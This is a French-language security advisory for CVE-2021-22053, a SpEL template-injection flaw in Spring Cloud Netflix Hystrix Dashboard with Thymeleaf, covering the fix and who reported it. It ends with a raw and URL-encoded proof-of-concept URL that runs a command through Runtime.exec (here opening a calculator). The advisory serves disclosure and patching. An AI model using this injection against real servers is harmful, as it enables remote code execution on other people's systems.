
Spring Cloud Netflix Hystrix Dashboard vulnérabilité de résolution de template CVE-2021-22053
Élevée
Spring par VMware
Les applications utilisant à la fois spring-cloud-netflix-hystrix-dashboard et spring-boot-starter-thymeleaf exposent un moyen d'exécuter du code soumis dans le chemin de l'URI de la requête lors de la résolution des templates de vue. Lorsqu'une requête est faite à /hystrix/monitor;[données fournies par l'utilisateur], les éléments du chemin suivant hystrix/monitor sont évalués comme des expressions SpringEL, ce qui peut conduire à une exécution de code.
La gravité est élevée sauf indication contraire.
Les utilisateurs des versions affectées doivent appliquer l'atténuation suivante : les utilisateurs doivent passer à la version 2.2.10.RELEASE+. Aucune autre étape n'est nécessaire. Les versions qui ont corrigé ce problème incluent :
Cette vulnérabilité a été identifiée et signalée de manière responsable par threedr3am du SecCoder Security Lab ([email protected]).
2021-11-17 : Rapport de vulnérabilité initial publié.
raw:
http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/
encode:
http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/
PS. La barre oblique '/' ne peut pas être utilisée dans la commande.